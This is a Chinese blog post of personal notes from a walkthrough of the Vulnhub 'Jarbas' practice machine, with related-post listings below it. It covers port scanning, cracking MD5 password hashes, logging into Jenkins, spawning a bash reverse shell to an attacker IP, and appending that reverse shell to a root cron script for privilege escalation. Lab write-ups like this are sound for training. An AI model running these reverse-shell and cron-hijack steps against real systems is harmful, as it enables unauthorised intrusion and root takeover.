Jarbas打靶记录

已于 2023-09-01 10:18:03 修改
阅读量52 收藏
点赞数
文章标签: 网络安全 安全 web安全
于 2023-07-13 17:03:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58815063/article/details/131568954
版权

/*此文章不具备任何参考作用,发布的目的是将csdn当做自己的云上笔记*/

1.使用nmap主机发现

sudo nmap -sn 192.168.88.0/24

2.对ip进行端口扫描

sudo nmap --min-rate 10000 -p-192.168.88.151

发现开放了 22,80,3306,8080四个端口

3.对开放的端口进行扫描

sudo nmap -sT -sV -O -P 22,80,3306,8080 192.168.88.151

通过扫描端口信息,发现此靶机为linux系统,并未发现有价值信息

4.使用udp协议对端口进行二次扫描

sudo nmap -sU -p22,80,3306,8080 192.168.88.151

使用udp协议进行扫描发现端口全部为关闭状态

5.继续对端口进行漏洞扫描

sudo nmap --script=vuln -p 22,80,3306,8080 192.168.88.151

 简单分析:

22端口为ssh端口,以我们的渗透经验来说22端口一般来说优先级要牌后,有攻击面的可能性很小

80端口存在的攻击面很广,但扫描结果没有发现dom和xss 也没有发现跨站脚本伪造

有一个枚举,发现了icons潜在的目录

3306端口危险有价值的信息

扫描结果发现8080端口存在robots.txt

6.查看靶机的web页面

查看8080端口下的robots.txt

 未发现有价值信息

因为存在80端口,所以我们先打开web页面及8080端口页面查看是否存在有用信息

靶机的80端口就是web的主页,而8080端口是一个登录页面

6.使用gobuster对靶机的ip进行目录扫描

sudo gobuster dir -u http://192.168.88.151 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

目录探测并未发现结果,指定页面类型html,php继续进行扫描

sudo gobuster dir -u http://192.168.88.151 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x html,php

扫描结果发现index.html和access.html

index.html为80端口的主页

打开access.html

很明显是md5加密

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

7.使用hash-identifier 进行判断

hash-identifier '5978a63b4654c73c60fa24f836386d87'

 判断为MD5加密

通过MD5解密结果为

5978a63b4654c73c60fa24f836386d87:italia99

9b38e2b1e8b12f426bod208a7ab6cb98:vipsu

f463f63616cb3f1e81ce46b39f882fd5:marianna

用解析的结果登录页面

发现是一个Jenkins

8.创建一个能够执行shell的项目

/bin/bash -i >& /dev/tcp/192.168.88.142/6666 0>&1

 

同时kali开启监听

sudo nc -lvnp port

 点击立即构建运行脚本

kali得到反馈,反弹shell构建成功

 查看sudo权限

没有任何权限

尝试查看系统有多少账号

 

 root是可以用的,显示分配给了用户环境

其他用户大概为功能性用户,估计不可以做人机交互,没有被bash分配

在渗透测试过程中,拿到的初始权限是基本的立足点,受限的shell经常得到非交互型shell或部分交互型shell。

首先root用户肯定是有用的,所以我们要把root的优先级排前。后面大多数都没有shell环境,输出的账户中,经过排查,eder是具有bash交互功能的,jenkins似乎就是我们的用户,但他给的bash环境却是false。

我们不能看到jbkg,也不能判断系统的更多信息,所以我们要尝试其他提权方式。

尝试先查看一下系统有没有自动任务

cat /etc/crontab

一般来说自动任务在corntab文件,也可能在其他文件,如果不是只能是不停的尝试

 运气很好,能够直接打开

最下面一行有一条记录  每五分钟以root权限 执行了 CleaningScript.sh 执行结果为丢掉了

这一行记录能给我们的信息是 找到了CleaningScript.sh所在的路径

下面拿出这个文件,查看一下里面是什么内容

 发现里面的内容为 删除access_log.txt访问日志

因为是以root权限执行的脚本,那么我们可以将我们自己的脚本追加到他的脚本中,或替掉他的脚本。

尝试将自己的降本直接写入到他们的脚本

echo "/bin/bash -i >& /dev/tcp/192.168.88.142/6665 0>&1" >>/etc/script/CleaningScript.sh

 我们把这个payload追加到他们的脚本中,每五分钟会执行一次,但我们并不知道执行下一次具体需要多久,我们在正式写入payload之前,我们要开启监听

 连接成功

 成功!!

kl37_dddan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队笔记-2:JARBAS打靶流程(vulnhub)
qq_63442530的博客
03-15 912
1.主机发现和端口扫描:nmap扫描发现靶机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密码,组合账号密码登录后台成功。
红队打靶JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1384
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
打靶:vulnhub中的JARBAS
qq_73865998的博客
04-08 851
复现视频:【「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。
渗透靶场之Jarbas
m0_56190544的博客
07-09 501
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
Jarbas
weixin_44770698的博客
12-01 41
Jarbas靶场练习
Jarbas-靶场
qq_46187131的博客
03-18 869
首先nmap做端口扫描,发现80和8080两个端口开放通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统通过目录扫描得知账号密码,并成功登录新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限收集提权信息发现自动任务有root权限运行的,并进行利用,写入shell成功拿到root权限,并查看flag。
Vulnhub - Jarbas
qq_46081990的博客
03-16 315
Nmap扫描目标主机,发现开放22、80、8080、3306端口,分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务,目标操作系统为Linux。因开放3306端口,猜测可能为MySQL账号密码,尝试连接但失败。对于类Github的中间件,比如上个靶场Devguru的Gitea,都可以去寻找有没有命令执行的地方,然后尝试反弹shell。将bash反弹命令追加到后面去,Kali这边nc监听5555端口,等待一段时间,成功收到会话拿到root权限和flag。
靶机精讲之JARBAS
m0_63285023的博客
04-05 457
靶机精讲之JARBAS
jarbas靶场渗透笔记
m0_60571990的博客
03-10 353
jarbas靶场渗透笔记
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
资源来自pypi官网。 资源全名:jarbas_hive_mind-0.3.5.tar.gz
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8237
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
最新发布
oray2013的专栏
05-22 233
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
保障餐饮场所安全:可燃气体报警器专业检测的必要性
BDjiance的博客
05-21 283
可燃气体报警器是一种用于监测空气中可燃气体浓度的设备,一旦检测到可燃气体浓度超过设定的安全范围,就会发出警报,提醒人们及时采取措施,避免火灾事故的发生。在日常经营中,餐饮场所也应当加强对可燃气体报警器的日常维护和保养,定期清洁和检查,确保其在平时的使用中处于良好的状态。其次,定期检测也可以校准报警器的灵敏度,确保其能够及时、准确地检测到可燃气体的泄漏情况,提供更可靠的安全保障。综上所述,餐饮场所应当认真对待可燃气体报警器的专业检测周期,选择正规的专业机构进行检测和校准,保障其安全可靠。
服务器漏洞安全修复记录
lxw1844912514的博客
05-22 325
Redis中线上使用keys *命令是非常危险的,应该禁用或者限制使用这些危险的命令,可降低Redis写入文件漏洞的入侵风险。描述:设置密码失效时间,强制定期修改密码,减少密码被泄漏和猜测风险,使用非密码登陆方式(如密钥对)请忽略此项。例如,在一个简单的 bash 脚本中,你可以检查用户输入的命令,如果是。重命名为一个难以猜测的命令,以此来减少恶意用户利用默认命令执行未授权操作的风险。但是,需要注意的是,Redis 并没有提供完全禁用命令的机制。命令,你可以考虑修改 Redis 源代码,从源头上移除。
大坝安全位测设备:位移监测站
thhj3312的博客
05-20 868
TH-WY1大坝安全位移监测设备是用于监测水库大坝位移变化的设备,旨在确保大坝的安全运行。总的来说,大坝安全位移监测设备是大坝安全管理的重要组成部分,通过实时、准确的监测数据,可以确保大坝的安全运行,减少潜在的安全风险。
F5发布2024年5月季度安全通告
2401_84434570的博客
05-22 1146
F5 BIG-IP Next Central Manager OData注入漏洞。F5 BIG-IP Next Central Manager SQL注入漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP APM浏览器网络访问VPN客户端来源验证错误漏洞。F5 BIG-IP Next CNF信息泄露漏洞。F5 BIG-IP配置实用程序跨站脚本漏洞。
RSA与AES:打造高效且超安全的混合加密方案
那仰望的人,心底的孤独和叹息
05-19 523
RSA结合AES混合加密,实现加密账号密码等,工具类代码。 RSA是**非对称加密**的一种,具有两个密钥:公共密钥和私有密钥。公钥和私钥是一对,公钥加密后的内容只有私钥才能解密。两个密钥的不同,所以是非对称的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值